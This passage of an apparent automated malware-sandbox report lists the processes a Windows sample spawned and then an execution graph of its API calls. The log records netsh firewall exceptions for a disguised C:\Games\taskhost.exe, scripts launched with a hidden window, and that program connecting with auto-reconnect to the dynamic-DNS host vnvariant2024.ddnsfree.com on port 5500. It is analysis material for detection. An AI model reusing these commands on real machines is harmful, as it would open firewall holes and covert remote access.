                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:12:18:03
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:12:18:03
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:12:18:03
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                            Imagebase:0xbc0000
                                                                            File size:59'392 bytes
                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:12:18:04
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:wmic process where (name="taskhost.exe") get commandline
                                                                            Imagebase:0xf10000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:12:18:04
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:findstr /i "taskhost.exe"
                                                                            Imagebase:0x9d0000
                                                                            File size:29'696 bytes
                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:14
                                                                            Start time:12:18:08
                                                                            Start date:23/01/2024
                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
                                                                            Imagebase:0x7ff6bc1b0000
                                                                            File size:5'641'176 bytes
                                                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:15
                                                                            Start time:12:18:08
                                                                            Start date:23/01/2024
                                                                            Path:C:\Games\viewer.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
                                                                            Imagebase:0x610000
                                                                            File size:412'832 bytes
                                                                            MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:16
                                                                            Start time:12:18:08
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 1
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:17
                                                                            Start time:12:18:09
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:18
                                                                            Start time:12:18:09
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:19
                                                                            Start time:12:18:09
                                                                            Start date:23/01/2024
                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                            Imagebase:0x7ff74bb60000
                                                                            File size:3'581'912 bytes
                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:20
                                                                            Start time:12:18:09
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:taskkill /im rundll32.exe /f
                                                                            Imagebase:0x180000
                                                                            File size:74'240 bytes
                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:21
                                                                            Start time:12:18:09
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\mode.com
                                                                            Wow64 process (32bit):true
                                                                            Commandline:Mode 90,20
                                                                            Imagebase:0x900000
                                                                            File size:26'624 bytes
                                                                            MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:23
                                                                            Start time:12:18:09
                                                                            Start date:23/01/2024
                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                            Imagebase:0x7ff74bb60000
                                                                            File size:3'581'912 bytes
                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:24
                                                                            Start time:12:18:10
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 2
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:25
                                                                            Start time:12:18:10
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:26
                                                                            Start time:12:18:11
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:27
                                                                            Start time:12:18:11
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                            Imagebase:0xbc0000
                                                                            File size:59'392 bytes
                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:28
                                                                            Start time:12:18:13
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:29
                                                                            Start time:12:18:15
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:cmd
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:31
                                                                            Start time:12:18:16
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:taskkill /im rundll32.exe /f
                                                                            Imagebase:0x180000
                                                                            File size:74'240 bytes
                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:32
                                                                            Start time:12:18:16
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\mode.com
                                                                            Wow64 process (32bit):true
                                                                            Commandline:Mode 90,20
                                                                            Imagebase:0x900000
                                                                            File size:26'624 bytes
                                                                            MD5 hash:FB615848338231CEBC16E32A3035C3F8
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:33
                                                                            Start time:12:18:16
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 2
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:35
                                                                            Start time:12:18:16
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
                                                                            Imagebase:0x1560000
                                                                            File size:82'432 bytes
                                                                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:36
                                                                            Start time:12:18:17
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                                                                            Imagebase:0x1560000
                                                                            File size:82'432 bytes
                                                                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:37
                                                                            Start time:12:18:17
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:wmic process where (name="taskhost.exe") get commandline
                                                                            Imagebase:0xf10000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:38
                                                                            Start time:12:18:17
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:findstr /i "taskhost.exe"
                                                                            Imagebase:0x9d0000
                                                                            File size:29'696 bytes
                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:39
                                                                            Start time:12:18:18
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:taskkill /im rundll32.exe /f
                                                                            Imagebase:0x180000
                                                                            File size:74'240 bytes
                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:40
                                                                            Start time:12:18:18
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 2
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:41
                                                                            Start time:12:18:19
                                                                            Start date:23/01/2024
                                                                            Path:C:\Games\taskhost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
                                                                            Imagebase:0xa0000
                                                                            File size:2'648'008 bytes
                                                                            MD5 hash:663FE548A57BBD487144EC8226A7A549
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Target ID:42
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Games\viewer.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
                                                                            Imagebase:0x610000
                                                                            File size:412'832 bytes
                                                                            MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:43
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Games\viewer.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
                                                                            Imagebase:0x610000
                                                                            File size:412'832 bytes
                                                                            MD5 hash:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:44
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 20
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:45
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:46
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:47
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:48
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:49
                                                                            Start time:12:18:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:50
                                                                            Start time:12:18:21
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:51
                                                                            Start time:12:18:21
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                                                            Imagebase:0xbc0000
                                                                            File size:59'392 bytes
                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:54
                                                                            Start time:12:18:40
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 20
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:55
                                                                            Start time:12:19:00
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 20
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:56
                                                                            Start time:12:19:20
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 20
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:58
                                                                            Start time:12:19:41
                                                                            Start date:23/01/2024
                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:timeout /t 20
                                                                            Imagebase:0xd30000
                                                                            File size:25'088 bytes
                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:6.2%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:24.8%
                                                                              Total number of Nodes:943
                                                                              Total number of Limit Nodes:50
                                                                              execution_graph 59192 108a3ce 59193 108a395 59192->59193 59196 10879ed 59193->59196 59222 108774b 59196->59222 59198 10879fd 59199 1087a5a 59198->59199 59209 1087a7e 59198->59209 59200 108798b DloadReleaseSectionWriteAccess 8 API calls 59199->59200 59201 1087a65 RaiseException 59200->59201 59216 1087c53 59201->59216 59202 1087b69 59206 1087c25 59202->59206 59208 1087bc7 GetProcAddress 59202->59208 59203 1087af6 LoadLibraryExA 59204 1087b09 GetLastError 59203->59204 59205 1087b57 59203->59205 59207 1087b32 59204->59207 59214 1087b1c 59204->59214 59205->59202 59210 1087b62 FreeLibrary 59205->59210 59233 108798b 59206->59233 59211 108798b DloadReleaseSectionWriteAccess 8 API calls 59207->59211 59208->59206 59212 1087bd7 GetLastError 59208->59212 59209->59202 59209->59203 59209->59205 59209->59206 59210->59202 59215 1087b3d RaiseException 59211->59215 59218 1087bea 59212->59218 59214->59205 59214->59207 59215->59216 59217 108798b DloadReleaseSectionWriteAccess 8 API calls 59219 1087c0b RaiseException 59217->59219 59218->59206 59218->59217 59220 108774b DloadAcquireSectionWriteAccess 8 API calls 59219->59220 59221 1087c22 59220->59221 59221->59206 59223 108777d 59222->59223 59224 1087757 59222->59224 59223->59198 59241 10877f4 59224->59241 59226 108775c 59228 1087778 59226->59228 59246 108791d 59226->59246 59251 108777e GetModuleHandleW GetProcAddress GetProcAddress 59228->59251 59230 10879c6 59231 10879e2 59230->59231 59232 10879de ReleaseSRWLockExclusive 59230->59232 59231->59198 59232->59198 59234 108799d 59233->59234 59235 10879bf 59233->59235 59236 10877f4 DloadAcquireSectionWriteAccess 4 API calls 59234->59236 59235->59216 59237 10879a2 59236->59237 59238 10879ba 59237->59238 59239 108791d DloadProtectSection 3 API calls 59237->59239 59254 10879c1 GetModuleHandleW GetProcAddress GetProcAddress ReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 59238->59254 59239->59238 59252 108777e GetModuleHandleW GetProcAddress GetProcAddress 59241->59252 59243 10877f9 59244 1087811 AcquireSRWLockExclusive 59243->59244 59245 1087815 59243->59245 59244->59226 59245->59226 59248 1087932 DloadProtectSection 59246->59248 59247 1087938 59247->59228 59248->59247 59249 108796d VirtualProtect 59248->59249 59253 1087833 VirtualQuery GetSystemInfo 59248->59253 59249->59247 59251->59230 59252->59243 59253->59249 59254->59235 59255 e89ce0 59256 e89cf8 59255->59256 59257 e89cea FindCloseChangeNotification 59255->59257 59257->59256 59258 e8b2a0 59259 e8b2f2 59258->59259 59260 e8b2ac 59258->59260 59260->59259 59262 e8b070 59260->59262 59263 e8b07e 59262->59263 59266 108c321 59263->59266 59265 e8b08b RtlAllocateHeap 59265->59259 59267 108c368 RaiseException 59266->59267 59268 108c33b 59266->59268 59267->59265 59268->59267 59269 ec56a5 59270 ec56ac 59269->59270 59281 1088665 49 API calls __Getctype 59270->59281 59272 ec570a 59282 1088596 38 API calls 2 library calls 59272->59282 59274 ec571d 59283 ecd1f0 4 API calls 3 library calls 59274->59283 59276 ec575f 59284 1088292 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 59276->59284 59278 ec576c 59285 108855f LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 59278->59285 59280 ec57a0 59281->59272 59282->59274 59283->59276 59284->59278 59285->59280 59286 10a28a0 59287 10a28dc __dosmaperr 59286->59287 59288 10a28ae __Getctype 59286->59288 59288->59287 59289 10a28c9 RtlAllocateHeap 59288->59289 59291 109faea EnterCriticalSection LeaveCriticalSection std::_Facet_Register 59288->59291 59289->59287 59289->59288 59291->59288 59292 fa0310 59293 fa0347 59292->59293 59299 fa0387 59292->59299 59300 108ab55 AcquireSRWLockExclusive 59293->59300 59295 fa0351 59295->59299 59305 108aac4 38 API calls 59295->59305 59297 fa0373 59306 108ab04 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59297->59306 59303 108ab69 59300->59303 59302 108ab6e ReleaseSRWLockExclusive 59302->59295 59303->59302 59307 108aba4 SleepConditionVariableSRW 59303->59307 59305->59297 59306->59299 59307->59303 59308 eb8c20 59309 eb8c8b 59308->59309 59311 eb8c55 std::ios_base::_Ios_base_dtor 59308->59311 59310 e88ed0 38 API calls 59310->59311 59311->59309 59311->59310 59312 fb1230 59313 fb127b 59312->59313 59314 fb1268 59312->59314 59320 f9f130 49 API calls 4 library calls 59313->59320 59325 108a6f5 59314->59325 59316 fb1285 59321 e88ed0 59316->59321 59319 fb12ca 59320->59316 59322 e88f1e std::ios_base::_Ios_base_dtor 59321->59322 59324 e88efd 59321->59324 59322->59314 59324->59314 59324->59321 59324->59322 59332 108fa4f 59324->59332 59326 108a6fd 59325->59326 59327 108a6fe IsProcessorFeaturePresent 59325->59327 59326->59319 59329 108aceb 59327->59329 59339 108acae SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 59329->59339 59331 108adce 59331->59319 59337 108f98b 38 API calls 2 library calls 59332->59337 59334 108fa5e 59338 108fa6c 11 API calls std::locale::_Setgloballocale 59334->59338 59336 108fa6b 59337->59334 59338->59336 